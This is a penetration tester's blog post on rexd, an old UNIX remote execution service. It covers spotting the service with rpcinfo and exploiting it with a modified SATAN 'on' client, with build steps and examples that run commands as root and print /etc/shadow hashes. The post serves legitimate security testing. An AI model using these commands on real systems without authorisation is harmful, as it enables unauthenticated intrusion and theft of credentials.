Rexd Client For Linux
I recently encountered the rexd service running on a host I was testing. This is a really old-school UNIX service which you don’t see much on modern networks (in my experience at least). It’s well know that it’s insecure: It basically lets you run any command on the host as any user you like with no authentication.
This post briefly covers how to identify the service and how to exploit it. I’ve also modified the rexd client from SATAN to compile cleanly on Linux (download link below…).
Identifying Hosts Running Rexd
Use rpcinfo to check the RPC service running on the target host (assuming the portmapper is running – 111/TCP). If rexd is listed, you’re in luck:
$ rpcinfo -p 10.0.0.1 program vers proto port 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind 100229 1 tcp 32795 metad 100229 2 tcp 32795 metad 100230 1 tcp 32796 metamhd 100242 1 tcp 32797 rpc.metamedd 100017 1 tcp 32798 rexd <--- ...
Exploitation is a simple as finding a client and running it. Solaris hosts usually have the client “on” installed by default. If you’ve got a Solaris VM, or you’ve already broken into another Solaris machine during your pentest, you can probably use that.
Alternatively, if you’d prefer a Linux client, it seems you’re out of luck. Modern distros don’t seem to have such a client (I checked Gentoo and Debian). SATAN (an old-school pentesting toolkit) has one which I modified to compile cleanly and be a bit easier to use. Download my modified rexd client here.
Update: 2011-11 Thanks to Hank Leininger for the patch. Now supports -p arg.
To compile / install:
$ tar xfz on.tar.gz $ cd on $ make $ sudo make install
$ on Usage: on [ -u uid ] [ -g gid ] [ -h hostname ] ip command... Examples: on 10.0.0.1 cat /etc/shadow on 10.0.0.1 -u 1 10.0.0.1 id on is a client for rexd, the Remote Execution Daemon. To check if a target is running rexd, do 'rpcinfo -p ip' and check for rexd (program number 100017). If rexd is running on the target you should be able to execute commands on the remote host as any user you like. This program is a minor modification of 'rex' by Wietse Venema, part of SATAN: http://www.porcupine.org/satan/mirrors.html
$ on 10.0.0.1 id uid=0(root) gid=0(root) $ on -u 1 -g 2 10.0.0.1 id uid=1(daemon) gid=2(bin) $ on 10.0.0.1 cat /etc/shadow root:.VLpoFoQoa8eY:14175:::::: daemon:NP:6445:::::: bin:NP:6445:::::: ...
Posted in Blog